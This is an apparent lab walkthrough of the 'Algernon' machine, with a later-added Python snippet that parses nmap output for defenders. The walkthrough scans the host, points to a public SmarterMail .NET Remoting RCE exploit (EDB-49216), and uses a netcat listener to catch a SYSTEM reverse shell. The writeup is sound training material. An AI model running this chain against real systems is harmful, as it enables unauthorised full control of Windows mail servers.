# Algernon

## Nmap

```
sudo nmap 192.168.147.65 -p- -sV -sS

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
9998/tcp  open  http          Microsoft IIS httpd 10.0
17001/tcp open  remoting      MS .NET Remoting services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Port 80 redirects to the default IIS page.

![](/files/-MUYsBqlW34l8V_WTrpS)

Port 9998 directs us to the following login page for SmarterMail.

![](/files/-MUYs1WrxgQa_-fEMBU-)

Researching SmarterMail exploits on Google, we come across an interesting one:

{% embed url="https://www.exploit-db.com/exploits/49216" %}

Looking at the description of this exploit, we have the following:

![](/files/-MUYsyu9NmdKt0qcdWiN)

Looking at the `nmap` results from earlier, we do have .NET Remoting running on port 17001, so this exploit should be applicable to the target machine.
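As an added example (not part of the original writeup), the following Python parses an `nmap -sV` service table like the one above and flags the exposure the writeup relies on: the SmarterMail web interface on 9998 together with the .NET Remoting listener on 17001. The sample table is constructed from the scan output above; the finding text is my own.

```python
import re
from typing import Dict, List

# Constructed sample: the service table from the nmap scan above, same columns.
NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
9998/tcp  open  http          Microsoft IIS httpd 10.0
17001/tcp open  remoting      MS .NET Remoting services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One table row: PORT/PROTO  STATE  SERVICE  [VERSION]; header and Service Info lines do not match.
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_services(text: str) -> Dict[int, dict]:
    """Parse the PORT/STATE/SERVICE/VERSION table of `nmap -sV` into a dict keyed by port."""
    services: Dict[int, dict] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, name, version = m.groups()
        if state != "open":
            continue
        services[int(port)] = {"proto": proto, "name": name, "version": version}
    return services


def flag_smartermail_exposure(services: Dict[int, dict]) -> List[str]:
    """Return defender findings for the combination the writeup exploits (hypothetical rule set)."""
    findings: List[str] = []
    remoting = services.get(17001)
    web_ui = services.get(9998)
    if remoting and "remoting" in (remoting["name"] + remoting["version"]).lower():
        findings.append("17001/tcp: .NET Remoting listener reachable from the scanning host; "
                        "EDB-49216 targets this channel, so bind it to localhost or firewall it")
    if web_ui and web_ui["name"] == "http":
        findings.append("9998/tcp: SmarterMail web interface exposed; verify the build is patched")
    if remoting and web_ui:
        findings.append("9998 and 17001 reachable together: the writeup's SYSTEM-level RCE path is open")
    return findings
```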

I downloaded the exploit and edited the following portion to match my IP and to use the local port of 21.

![](/files/-MUYtYZGoL8tqOaE_TgJ)

I then set up a `netcat` listener for port 21.

```
sudo nc -lvp 21
```

I then executed the exploit and received a reverse shell as SYSTEM.

![](/files/-MUYtuaX9niBh34gqavk)
